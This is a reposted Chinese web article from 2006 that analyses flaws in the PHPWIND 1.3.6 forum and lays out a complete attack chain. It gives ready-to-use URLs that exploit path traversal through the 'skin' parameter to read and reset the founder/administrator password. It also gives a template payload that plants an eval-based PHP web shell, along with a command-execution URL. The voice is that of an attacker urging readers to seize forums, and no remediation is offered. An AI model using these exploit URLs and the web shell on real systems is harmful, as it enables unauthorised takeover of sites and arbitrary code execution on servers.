dz论坛漏洞,PHPWIND1.3.6论坛漏洞分析

PHPWIND1.3.6论坛漏洞分析 - 网络安全 - 电脑教程网

PHPWIND1.3.6论坛漏洞分析

日期:2006-11-19   荐:
来源:中华盾

PHPWIND论坛是一款流行的PHP论坛,界面美观,功能也比较强大。但大家仔细看一下会发现不论是从界面功能还是代码风格,它和DISCUZ都非常相似,具体原因我想也就不用说了,毕竟DISCUZ出来比它要早很多。但安全上它没有继承DISCUZ的优点,DISCUZ论坛安全性非常好,而且商家也对此非常重视安全问题,国内论坛中不论从功能还是安全,第一非DISCUZ莫属。PHPWIND虽然代码严谨,逻辑清楚,但还是有一些漏洞,而且还相当严重。
一 SKIN变量未过滤导致管理员密码更改
废话少说,我们来分析漏洞。漏洞代码如下(header.php):

<?php
!function_exists('readover') && exit('Forbidden');
if (!$skin) $skin=$db_defaultstyle;

if(file_exists(R_P."data/style/$skin.php")){
include_once(R_P."data/style/$skin.php");
}else{
include_once(R_P."data/style/wind.php");
}
$yeyestyle=='no' ? $i_table="bgcolor=$tablecolor" : $i_table='class=i_table';
if($groupid=='guest' && $db_regpopup=='1'){
$head_pop='head_pop';
} else{
$head_gotmsg=$winddb['newpm']==1 ? '<font color=red>您有新消息</font>':'短消息';
}
require_once(PrintEot('Css'));

require_once(PrintEot('header'));
?>

其中$skin变量是我们提交的,在运行到这里之前,只有一个地方处理过$skin变量:

$_COOKIE['skinco'] && empty($skin) && $skin=$_COOKIE['skinco'];
语句判断COOKIE中是否已经包含skinco的信息,如果有了,就取得COOKIE中的值,这是处理个人页面风格用的。但如果我们的COOKIE中没有这个值,那么我们提交的skin变量就会一点不变的传到上面的漏洞代码。有人问,如果系统关了register_globals会怎么样,关了也没关系。

if(!ini_get('register_globals') !get_magic_quotes_gpc()){
@extract($_POST,EXTR_SKIP);
@extract($_GET,EXTR_SKIP);
@extract($_COOKIE,EXTR_SKIP)
@extract($_FILES,EXTR_SKIP);
}

系统在global.php中又给释放了。所以我们不管是用GET方法或者POST方法都可以把构造好的SKIN变量传给程序。那传给程序有什么用呢?这是重点!
我们看这段代码:

if(file_exists(R_P."data/style/$skin.php")){
include_once(R_P."data/style/$skin.php");
}…

含义是如果(R_P."data/style/$skin.php")文件存在就把它包含进来,我也不分析有几种用法了,我直接给出我最简单危害最大的利用方法。
我们把skin的值设为"../../admin/manager",那就变成了R_P."data/style/../.. /admin/manager.php",很显然,这是论坛管理用户的一个程序,存在而且可执行。这个程序是专门用来修改sql_config.php 的,这里面都是重要数据,包括论坛创始人的用户名和密码。我们只要构造好就可以改它的密码,直接登陆后台管理。在改之前我们可以先查看创始人的用户名。
我给出查看的方法,大家可以比对论坛程序自己分析一下,我就不在赘述了。
http://localhost/phpwind/faq.php?skin=../../admin/manager&tplpath=admin

图1(偶没有上传图)

上面是我机子上的截图,其中tplpath变量非常重要,必须是admin,它是一个template路径,参数不对就不会显示了
好我们看了知道了用户名,就可以改它的密码了。
http://localhost/phpwind/faq.php?skin=../../admin/manager&username=admin&password=xiaohua&check_pwd=xiaohua&action=go
上面的几个参数的含义大家一看就明白,那个username必须添上面看到的用户名,密码自己设,至于为什么要按上面的方法构造,其实很简单 manager.php需要哪些变量我们就提交哪些变量,不需要的我们不管。上面的变量是它所需要的,所以我们就提交这些变量,注意上面的action必须有值。提交后系统什么都不显示,没关系,我们再用第一次的方法就会发现两次密码不一样,证明我们改成功了。如图2所示:

密码该了,我们就可以从管理页面登陆了。
http://localhost/phpwind/admin.php

二 后台利用 上传SHELL
本来改了管理员密码已经能控制论坛了,但我我觉得不传SHELL总觉得事情只做了一半。如何上传SHELL,这就要用到后台的功能了。PHPWIND不知是想给管理员非常大的权限还是认为没有人有能力进入后台,后台的权利真是大的惊人。其实我们不靠上面的方法,用跨站手段得到管理员密码也不难,不知写论坛的人是怎么想的。
好,我就随便拣一处危害比较大的地方给大家分析一下,分析一下风格模板设置那个地方。
点一下左边的连接,右边会显示 /template/wind/css.htm。
系统提供的功能简化理解就是可以任意编辑这个CSS文件,为论坛的界面做个性化设置,而且论坛运行的时候会include这个css文件,虽然它的扩展名是.htm,但是照样会和其他PHP文件一样运行。如果我们能象这个css.htm文件写一些PHP代码,就相当于我们写一个SHELL,是不是很简单。篇幅有限,我直接给出利用方法。把那个右边的textarea里面的换成下面的,然后点提交就行了。

<style type='text/css'>
</style>
<!--
EOT;
?>-->
<?php
eval($_GET[myphpcode]);
?>
<!--
<?php
print <<<EOT
-->
<style type='text/css'>
TABLE { BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 2px}
select { FONT-SIZE: 9pt; COLOR: #000000; BACKGROUND-COLOR: $forumcolorone}
A { TEXT-DECORATION: none;}
a:hover{ text-decoration: underline;}
BODY {font-family:Verdana;FONT-SIZE: 12px;color: #000000;background: #ffffff;}
textarea,input,object { font-family: Tahoma, Verdana; font-size: 12px; color: #000000;font-weight: normal; background-color: $forumcolorone }
TD { BORDER-RIGHT: 1px; BORDER-TOP: 0px; FONT-SIZE: 9pt; COLOR: #000000;}
.head { color: #ffffff;background: #6699CC;padding: 5px;}
.f_one {background: $forumcolorone;}
.f_two {background: $forumcolortwo;}
.t_one {background: $threadcolorone;}
.t_two {background: $threadcolortwo;}
.cbg { color:#000000;background: #D1DCEB;}
.smalltxt {font-family: Tahoma, Verdana; font-size: 8pt;color: #000000;}
.table { color:#000000;}
.cfont { color:#ffffff; }
.fnamecolor { color:#003366;}
.bold {font-weight:bold;}
.headurl { color:#ffffff;}
.index_font{color: #3A4F6C;background-color:#D1DCEB; font-weight:bold;padding: 5px;}
.tpc_title { font-size: 12px;}
.tpc_content { font-size: 12px;}
.i_table {BORDER-RIGHT: $tablecolor 1px solid; BORDER-TOP: $tablecolor 1px solid; BORDER-LEFT: $tablecolor 1px solid; BORDER-BOTTOM: $tablecolor 1px solid;}
</style>

大家最好按上面的构造,当然也可以自己构造,不过上面的方法我做过实验,成功率很高。
保存之后,用下面的方法就可以利用了。
http://localhost/phpwind/faq.php?myphpcode=echo%20system(dir);exit;
运行后如图4

可以运行其它PHP语句,在此不在赘述。

(出处:http://www.sheup.com)




标签: